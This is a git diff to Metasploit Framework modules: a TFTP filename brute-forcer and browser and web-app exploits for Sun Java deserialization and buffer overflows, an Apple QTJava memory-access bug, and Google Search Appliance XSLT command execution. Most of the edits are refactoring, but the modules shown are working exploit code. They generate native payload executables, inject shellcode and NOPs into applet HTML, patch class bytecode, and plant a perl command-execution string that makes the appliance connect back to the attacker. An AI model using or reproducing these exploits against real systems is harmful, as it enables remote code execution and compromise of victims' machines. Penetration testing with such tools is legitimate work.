diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index 8263b53244..c105bfb257 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -28,7 +28,8 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT(69), - OptPath.new('DICTIONARY', [ true, 'The list of filenames', File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ]) + OptPath.new('DICTIONARY', [ true, 'The list of filenames', + File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ]) ], self.class) end @@ -41,9 +42,9 @@ class Metasploit3 < Msf::Auxiliary { 'Msf' => framework, 'MsfExploit' => self, - } + } ) - + fd = File.open(datastore['DICTIONARY'], 'r') fd.read(fd.stat.size).split("\n").each do |filename| filename.strip! diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index b2fff27809..0fa5934290 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -12,37 +16,37 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML - + def initialize( info = {} ) - + super( update_info( info, - 'Name' => 'Sun Java Calendar Deserialization Exploit', - 'Description' => %q{ + 'Name' => 'Sun Java Calendar Deserialization Exploit', + 'Description' => %q{ This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. - - The payload can be either a native payload which is generated as an executable and + + The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. - + The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected). }, - 'License' => MSF_LICENSE, - 'Author' => [ 'sf', 'hdm' ], - 'Version' => '1', - 'References' => + 'License' => MSF_LICENSE, + 'Author' => [ 'sf', 'hdm' ], + 'Version' => '$Revision$', + 'References' => [ [ 'CVE', '2008-5353' ], [ 'OSVDB', '50500'], [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ], [ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ], [ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ], - [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ] + [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ] ], - 'Platform' => [ 'win', 'osx', 'linux', 'solaris' ], - 'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true }, - 'Targets' => + 'Platform' => [ 'win', 'osx', 'linux', 'solaris' ], + 'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => [ - [ 'Generic (Java Payload)', + [ 'Generic (Java Payload)', { # This is a bad hack to force only the generic/shell_bind_tcp and generic/shell_reverse_tcp payloads 'Platform' => ['win'], @@ -50,36 +54,47 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_CMD, } ], - [ 'Windows x86 (Native Payload)', + [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], - [ 'Mac OS X PPC (Native Payload)', + [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], - [ 'Mac OS X x86 (Native Payload)', + [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], - [ 'Linux x86 (Native Payload)', + [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, } ], ], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0 )) end + def exploit + # load the static jar file + path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" ) + fd = File.open( path, "rb" ) + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + def on_request_uri( cli, request ) data = nil host = nil @@ -90,15 +105,15 @@ class Metasploit3 < Msf::Exploit::Remote send_redirect( cli, get_resource() + '/', '') return end - + print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." ) - + payload = regenerate_payload( cli ) if not payload print_status( "Failed to generate the payload." ) return end - + if target.name == 'Generic (Java Payload)' if datastore['LHOST'] host = datastore['LHOST'] @@ -110,15 +125,15 @@ class Metasploit3 < Msf::Exploit::Remote print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." ) end else - + if target['Arch'] == ARCH_X86 data = Msf::Util::EXE.to_win32pe( framework, payload.encoded ) if target['Platform'] == 'win' - data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx' + data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx' data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux' elsif target['Arch'] == ARCH_PPC data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx' end - + if data print_status( "Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) @@ -126,19 +141,19 @@ class Metasploit3 < Msf::Exploit::Remote print_status( "Failed to generate the executable." ) return end - + end - - send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) + + send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) return end - - print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." ) + + print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." ) send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end - + def generate_html( data, host, port ) html = "Loading, Please Wait..." html += "

Loading, Please Wait...

" @@ -149,13 +164,9 @@ class Metasploit3 < Msf::Exploit::Remote html += "" return html end - + def generate_jar() - path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" ) - fd = File.open( path, "rb" ) - data = fd.read(fd.stat.size) - fd.close - return data + return @jar_data end - + end diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 4fcaf0ab88..7776108f31 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking # # This module acts as an HTTP server @@ -26,25 +26,25 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow', 'Description' => %q{ This module exploits a flaw in the getSoundbank function in the Sun JVM. - + The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. - - The effected Java versions are JDK and JRE 6 Update 16 and earlier, - JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and + + The effected Java versions are JDK and JRE 6 Update 16 and earlier, + JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. - + NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ 'kf', # Original PoC/exploit 'jduck' # metasploit version ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-3867' ], [ 'OSVDB', '59711' ], @@ -70,19 +70,19 @@ No automatic targetting for now ... } ], =end - [ 'J2SE 1.6_16 on Windows x86', + [ 'J2SE 1.6_16 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], - [ 'J2SE 1.6_16 on Mac OS X PPC', + [ 'J2SE 1.6_16 on Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], - [ 'J2SE 1.6_16 on Mac OS X x86', + [ 'J2SE 1.6_16 on Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, @@ -93,23 +93,34 @@ No automatic targetting for now ... 'DisclosureDate' => 'Nov 04 2009' )) end - - + + + def exploit + # load the static jar + path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar") + fd = File.open(path, "rb") + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + def on_request_uri(cli, req) - + # Create a cached mapping between IP and detected target @targetcache ||= {} @targetcache[cli.peerhost] ||= {} @targetcache[cli.peerhost][:update] = Time.now.to_i - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) case req.headers['User-Agent'] when /Windows/i print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[1] when /PPC Mac OS X/i print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...") - @targetcache[cli.peerhost][:target] = self.targets[2] + @targetcache[cli.peerhost][:target] = self.targets[2] when /Intel Mac OS X/i print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[3] @@ -118,27 +129,27 @@ No automatic targetting for now ... end end - # Clean the cache + # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:update]+60) rmq.push addr end end - + rmq.each {|addr| @targetcache.delete(addr) } - - + + # Request processing if (not req.uri.match(/\.jar$/i)) - + # Redirect to the base directory so the applet code loads... if (not req.uri.match(/\/$/)) print_status("Sending redirect so path ends with / ...") send_redirect(cli, get_resource() + '/', '') return end - + # Display the applet loading HTML print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(payload.encoded), @@ -148,10 +159,10 @@ No automatic targetting for now ... }) return end - + # Send the actual applet over print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...") - send_response(cli, generate_applet(cli, req), + send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream', 'Pragma' => 'no-cache' @@ -169,14 +180,18 @@ No automatic targetting for now ... - + | - # ugh.. pain + # finalize the html + jar_name = rand_text_alphanumeric(32) + html.gsub!(/JARNAME/, jar_name) + + # add payload debug_payload = false pload = "" pload << "\xcc" if debug_payload @@ -188,11 +203,12 @@ No automatic targetting for now ... print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload)) end html.gsub!(/SCODE/, Rex::Text.to_hex(pload, '')) - + + # add nops nops = "\x90\x90\x90\x90" html.gsub!(/NOPS/, Rex::Text.to_hex(nops, '')) #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops)) - + return html end @@ -201,7 +217,7 @@ No automatic targetting for now ... def generate_applet(cli, req) this_target = nil - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) if (@targetcache[cli.peerhost][:target]) this_target = @targetcache[cli.peerhost][:target] else @@ -211,13 +227,7 @@ No automatic targetting for now ... this_target = target end - path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar") - - fd = File.open(path, "rb") - data = fd.read(fd.stat.size) - fd.close - - return data - end + return @jar_data + end end diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 39dfdc37ea..add9609552 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking # # This module acts as an HTTP server @@ -26,24 +26,24 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow', 'Description' => %q{ This module exploits a flaw in the setDiffICM function in the Sun JVM. - + The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. - - The effected Java versions are JDK and JRE 6 Update 16 and earlier, + + The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. - + NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ 'jduck' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-3869' ], [ 'OSVDB', '59710' ], @@ -70,19 +70,19 @@ No automatic targetting for now ... } ], =end - [ 'J2SE 1.6_16 on Windows x86', + [ 'J2SE 1.6_16 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], - [ 'J2SE 1.6_16 on Mac OS X PPC', + [ 'J2SE 1.6_16 on Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], - [ 'J2SE 1.6_16 on Mac OS X x86', + [ 'J2SE 1.6_16 on Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, @@ -93,23 +93,23 @@ No automatic targetting for now ... 'DisclosureDate' => 'Nov 04 2009' )) end - - + + def on_request_uri(cli, req) - + # Create a cached mapping between IP and detected target @targetcache ||= {} @targetcache[cli.peerhost] ||= {} @targetcache[cli.peerhost][:update] = Time.now.to_i - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) case req.headers['User-Agent'] when /Windows/i print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[1] when /PPC Mac OS X/i print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...") - @targetcache[cli.peerhost][:target] = self.targets[2] + @targetcache[cli.peerhost][:target] = self.targets[2] when /Intel Mac OS X/i print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[3] @@ -118,27 +118,27 @@ No automatic targetting for now ... end end - # Clean the cache + # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:update]+60) rmq.push addr end end - + rmq.each {|addr| @targetcache.delete(addr) } - - + + # Request processing if (not req.uri.match(/\.jar$/i)) - + # Redirect to the base directory so the applet code loads... if (not req.uri.match(/\/$/)) print_status("Sending redirect so path ends with / ...") send_redirect(cli, get_resource() + '/', '') return end - + # Display the applet loading HTML print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(payload.encoded), @@ -148,10 +148,10 @@ No automatic targetting for now ... }) return end - + # Send the actual applet over print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...") - send_response(cli, generate_applet(cli, req), + send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream', 'Pragma' => 'no-cache' @@ -169,14 +169,18 @@ No automatic targetting for now ... - + | - # ugh.. pain + # finalize html + jar_name = rand_text_alphanumeric(32)+".jar" + html.gsub!(/JARNAME/, jar_name) + + # put payload into html debug_payload = false pload = "" pload << "\xcc" if debug_payload @@ -188,20 +192,31 @@ No automatic targetting for now ... print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload)) end html.gsub!(/SCODE/, Rex::Text.to_hex(pload, '')) - + + # put nops into html nops = "\x90\x90\x90\x90" html.gsub!(/NOPS/, Rex::Text.to_hex(nops, '')) #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops)) - + return html end + def exploit + path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar") + fd = File.open(path, "rb") + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + def generate_applet(cli, req) this_target = nil - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) if (@targetcache[cli.peerhost][:target]) this_target = @targetcache[cli.peerhost][:target] else @@ -211,13 +226,7 @@ No automatic targetting for now ... this_target = target end - path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar") - - fd = File.open(path, "rb") - data = fd.read(fd.stat.size) - fd.close - - return data - end + return @jar_data + end end diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index 2a61700dc8..012721c37b 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,18 +26,18 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Apple QTJava toQTPointer() Arbitrary Memory Access', 'Description' => %q{ This module exploits an arbitrary memory access vulnerability in the - Quicktime for Java API provided with Quicktime 7. + Quicktime for Java API provided with Quicktime 7. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ 'hdm', # Original exploit for Mac OS X PPC / Win32 'kf', # Added support for Mac OS X X86 'ddz' # Discovered bug, provided tips ], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2007-2175'], ['OSVDB', '34178'], @@ -54,100 +54,112 @@ class Metasploit3 < Msf::Exploit::Remote # # Problem with generic payloads + regenerate_payload still :( # -# [ 'Quicktime 7 Automatic', +# [ 'Quicktime 7 Automatic', # { # 'Platform' => ['win', 'osx'], # 'Arch' => [ARCH_X86, ARCH_PPC] # } # ], - [ 'Quicktime 7 on Windows x86', + [ 'Quicktime 7 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], - [ 'Quicktime 7 on Mac OS X PPC', + [ 'Quicktime 7 on Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], - [ 'Quicktime 7 on Mac OS X x86', + [ 'Quicktime 7 on Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } - ], + ], ], # 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 23 2007' )) end + + def exploit + # load the class data + path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class") + fd = File.open(path, "rb") + @class_data = fd.read(fd.stat.size) + fd.close + + super + end + + def on_request_uri(cli, req) - + # Create a cached mapping between IP and detected target @targetcache ||= {} @targetcache[cli.peerhost] ||= {} @targetcache[cli.peerhost][:update] = Time.now.to_i - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) case req.headers['User-Agent'] when /Windows/i print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[1] when /PPC Mac OS X/i print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...") - @targetcache[cli.peerhost][:target] = self.targets[2] + @targetcache[cli.peerhost][:target] = self.targets[2] when /Intel Mac OS X/i print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[3] end end - # Clean the cache + # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:update]+60) rmq.push addr end end - + rmq.each {|addr| @targetcache.delete(addr) } - - + + # Request processing - + if (not req.uri.match(/\.class$/i)) - + # Redirect to the base directory so the applet code loads... if (not req.uri.match(/\/$/)) send_redirect(cli, get_resource() + '/', '') return end - + # Display the applet loading HTML print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") - send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' }) + send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' }) return end - + # Send the actual applet over print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' }) - + # Handle the payload handler(cli) end - + def generate_html() return "" end - + def generate_applet(cli, req) this_target = nil - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) if (@targetcache[cli.peerhost][:target]) this_target = @targetcache[cli.peerhost][:target] else @@ -157,15 +169,12 @@ class Metasploit3 < Msf::Exploit::Remote this_target = target end - path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class") + # make a copy.. + data = @class_data.dup - fd = File.open(path, "rb") - data = fd.read(fd.stat.size) - fd.close - # 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86 idx_targ = data.index("\x03\x10\xcc\x54") - + # 1024 bytes for shellcode idx_code = data.index("\x03\x10\xf0\x54") @@ -175,34 +184,34 @@ class Metasploit3 < Msf::Exploit::Remote data = patch_bytecode(idx_code, data, tp.encoded) data = patch_bytecode(idx_targ, data, "\x01") end - + # Handle Mac OS X x86 / Windows x86 if (this_target.arch.include?(ARCH_X86)) - + if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows)) tp = regenerate_payload(cli, 'win', ARCH_X86, this_target) data = patch_bytecode(idx_code, data, tp.encoded) data = patch_bytecode(idx_targ, data, "\x03") end - + if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX)) tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target) data = patch_bytecode(idx_code, data, tp.encoded) - data = patch_bytecode(idx_targ, data, "\x02") - end - end + data = patch_bytecode(idx_targ, data, "\x02") + end + end return data - end + end def patch_bytecode(off, data, buff) - + cnt = 0 off -= 1 while (cnt < buff.length) - cnt += 1 + cnt += 1 while (! (data[off-1] == 0x10 && data[off+1] == 0x54)) - off+=1 + off += 1 end data[off]=buff[cnt-1] off += 1 @@ -211,5 +220,5 @@ class Metasploit3 < Msf::Exploit::Remote return data end - + end diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 1abfb8f69a..f7a7a13865 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,14 +19,14 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Google Appliance ProxyStyleSheet Command Execution', 'Description' => %q{ This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary - java methods to be called. Google released a patch and advisory to + java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance - must be able to connect back to your machine for this exploit to work. + must be able to connect back to your machine for this exploit to work. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl bash telnet netcat-e', } - }, + }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], @@ -58,24 +58,18 @@ class Metasploit3 < Msf::Exploit::Remote # Handle incoming requests from the appliance def on_request_uri(cli, request) - + print_status("Handling new incoming HTTP request...") - - path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml") - - fd = File.open(path, "r") - data = fd.read(fd.stat.size) - fd.close exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))' - data.gsub!(/:x:MSF:x:/, exec_str) + data = @xml_data.gsub(/:x:MSF:x:/, exec_str) send_response(cli, data) end - + def check res = send_request_cgi({ 'uri' => '/search', - 'vars_get' => + 'vars_get' => { 'client' => rand_text_alpha(rand(15)+1), 'site' => rand_text_alpha(rand(15)+1), @@ -84,48 +78,54 @@ class Metasploit3 < Msf::Exploit::Remote 'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/' } }, 10) - + if (res and res.body =~ /cannot be resolved to an ip address/) print_status("This system appears to be vulnerable") return Exploit::CheckCode::Vulnerable end - + if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/) print_status("This system appears to be patched") end - + print_status("This system is not exploitable") return Exploit::CheckCode::Safe end - - + + def exploit - + + # load the xml data + path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml") + fd = File.open(path, "r") + @xml_data = fd.read(fd.stat.size) + fd.close + print_status("Obtaining the appliance site and client IDs...") # Send a HTTP/1.0 request to learn the site configuration res = send_request_raw({ 'uri' => '/', 'version' => '1.0' }, 10) - + if !(res and res['location'] and res['location'] =~ /site=/) print_status("Could not read the location header: #{res.code} #{res.message}") return end - + m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im) if !(m and m[1] and m[2]) print_status("Invalid location header: #{res['location']}") - return + return end - + print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...") start_service - + print_status("Requesting a search using our custom XSLT...") res = send_request_cgi({ 'uri' => '/search', - 'vars_get' => + 'vars_get' => { 'client' => m[2], 'site' => m[1], @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote 'proxyreload' => '1' } }, 25) - + if (res) print_status("The server returned: #{res.code} #{res.message}") print_status("Waiting on the payload to execute...") @@ -143,9 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote else print_status("No response from the server") end - + print_status("Shutting down the web service...") stop_service end - + end